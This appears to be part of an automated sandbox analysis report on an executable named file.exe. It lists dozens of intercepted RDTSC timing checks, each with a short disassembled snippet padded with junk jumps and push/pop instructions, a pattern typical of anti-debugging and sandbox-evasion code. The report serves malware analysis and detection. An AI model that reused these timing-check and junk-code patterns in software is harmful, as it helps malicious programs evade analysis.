                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660C2E second address: 660C5A instructions: 0x00000000 rdtsc 0x00000002 je 00007FC070C1F306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC070C1F308h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC070C1F316h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663D2D second address: 663D55 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC070F37E3Ch 0x00000008 push ebx 0x00000009 ja 00007FC070F37E36h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007FC070F37E3Ch 0x0000001c je 00007FC070F37E36h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6667A9 second address: 6667C9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC070C1F306h 0x00000008 jmp 00007FC070C1F316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6664BE second address: 6664D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 jne 00007FC070F37E36h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6664D2 second address: 666502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C1F30Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC070C1F313h 0x00000010 jl 00007FC070C1F306h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666502 second address: 666507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666507 second address: 666526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F319h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666526 second address: 66652A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C0DB second address: 66C0E9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC070C1F306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622E9B second address: 622EB6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC070F37E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC070F37E3Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622EB6 second address: 622EE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F30Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push edi 0x0000000b movsx edx, di 0x0000000e pop edi 0x0000000f mov ebx, dword ptr [ebp+12487F01h] 0x00000015 mov edx, dword ptr [ebp+122D2C2Dh] 0x0000001b add eax, ebx 0x0000001d and edi, dword ptr [ebp+122D2673h] 0x00000023 push eax 0x00000024 push esi 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C225 second address: 66C239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E40h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C239 second address: 66C23F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C23F second address: 66C274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007FC070F37E3Ch 0x0000000d jmp 00007FC070F37E44h 0x00000012 pushad 0x00000013 je 00007FC070F37E36h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C3DC second address: 66C3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C3E2 second address: 66C3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007FC070F37E36h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C3F6 second address: 66C409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F30Eh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FB02 second address: 66FB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FC3C second address: 66FC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FC42 second address: 66FC4C instructions: 0x00000000 rdtsc 0x00000002 je 00007FC070F37E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FC4C second address: 66FC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC070C1F316h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FC6E second address: 66FC7B instructions: 0x00000000 rdtsc 0x00000002 js 00007FC070F37E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67410D second address: 67411D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F30Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67411D second address: 674132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E41h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6747CE second address: 6747D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6747D4 second address: 6747DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6747DA second address: 6747E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6747E0 second address: 6747EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007FC070F37E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674919 second address: 67491D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AA60 second address: 67AA8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC070F37E46h 0x00000008 jno 00007FC070F37E36h 0x0000000e jnp 00007FC070F37E36h 0x00000014 popad 0x00000015 jne 00007FC070F37E3Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AA8E second address: 67AA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC070C1F320h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B051 second address: 67B07A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC070F37E47h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B5EB second address: 67B601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC070C1F306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007FC070C1F306h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B601 second address: 67B605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B8F5 second address: 67B8FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B8FC second address: 67B906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681F4D second address: 681F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6852A6 second address: 6852AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685696 second address: 6856AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FC070C1F30Ch 0x0000000e jc 00007FC070C1F306h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6856AE second address: 6856B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685962 second address: 685999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F30Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FC070C1F30Ch 0x00000010 pushad 0x00000011 jmp 00007FC070C1F315h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D3D4 second address: 68D3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E45h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D3ED second address: 68D402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F311h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D402 second address: 68D416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC070F37E3Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D416 second address: 68D41C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D41C second address: 68D42D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D701 second address: 68D705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D705 second address: 68D70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694A72 second address: 694A7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694BEC second address: 694BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694D27 second address: 694D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694D2C second address: 694D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FC070F37E36h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694D4D second address: 694D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC070C1F311h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694D79 second address: 694D83 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC070F37E3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D02 second address: 6A1D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C1F30Bh 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D12 second address: 6A1D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D18 second address: 6A1D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D1C second address: 6A1D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FC070F37E36h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D41 second address: 6A1D4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007FC070C1F306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A1D4D second address: 6A1D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A1D53 second address: 6A1D5D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC070C1F306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A1D5D second address: 6A1D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A37FC second address: 6A3801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A3801 second address: 6A382C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FC070F37E3Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A6BD2 second address: 6A6BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A6BD6 second address: 6A6C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC070F37E4Ah 0x0000000c jc 00007FC070F37E36h 0x00000012 jmp 00007FC070F37E3Eh 0x00000017 jmp 00007FC070F37E44h 0x0000001c jmp 00007FC070F37E41h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A6C21 second address: 6A6C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6A6C28 second address: 6A6C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AFA29 second address: 6AFA2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AFA2D second address: 6AFA31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AFA31 second address: 6AFA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AFA37 second address: 6AFA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6AFA3D second address: 6AFA55 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC070C1F313h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6B7218 second address: 6B721D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6B721D second address: 6B7223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6B7223 second address: 6B722D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC070F37E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6B881B second address: 6B885F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC070C1F30Bh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007FC070C1F314h 0x00000015 je 00007FC070C1F306h 0x0000001b pop edi 0x0000001c push edx 0x0000001d jmp 00007FC070C1F311h 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6B885F second address: 6B8865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6B8865 second address: 6B886B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C26D4 second address: 6C26E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C26E1 second address: 6C26E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C26E7 second address: 6C26EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C0E75 second address: 6C0E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C0FDE second address: 6C1015 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC070F37E45h 0x00000008 jbe 00007FC070F37E36h 0x0000000e jns 00007FC070F37E36h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jne 00007FC070F37E36h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C11B5 second address: 6C11BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C18F3 second address: 6C1902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC070F37E3Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C242C second address: 6C2443 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC070C1F306h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d js 00007FC070C1F328h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C2443 second address: 6C245B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E44h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6D4C2A second address: 6D4C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6D4C30 second address: 6D4C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC070F37E36h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6D4C3E second address: 6D4C44 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6D4C44 second address: 6D4C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FC070F37E46h 0x0000000f jmp 00007FC070F37E3Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6D4C71 second address: 6D4C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6D4C77 second address: 6D4C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D7639 second address: 5D765D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C1F318h 0x00000009 jnp 00007FC070C1F30Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6E83F6 second address: 6E840C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E41h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F75E4 second address: 6F75F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FC070C1F306h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F75F3 second address: 6F75F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F75F7 second address: 6F75FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
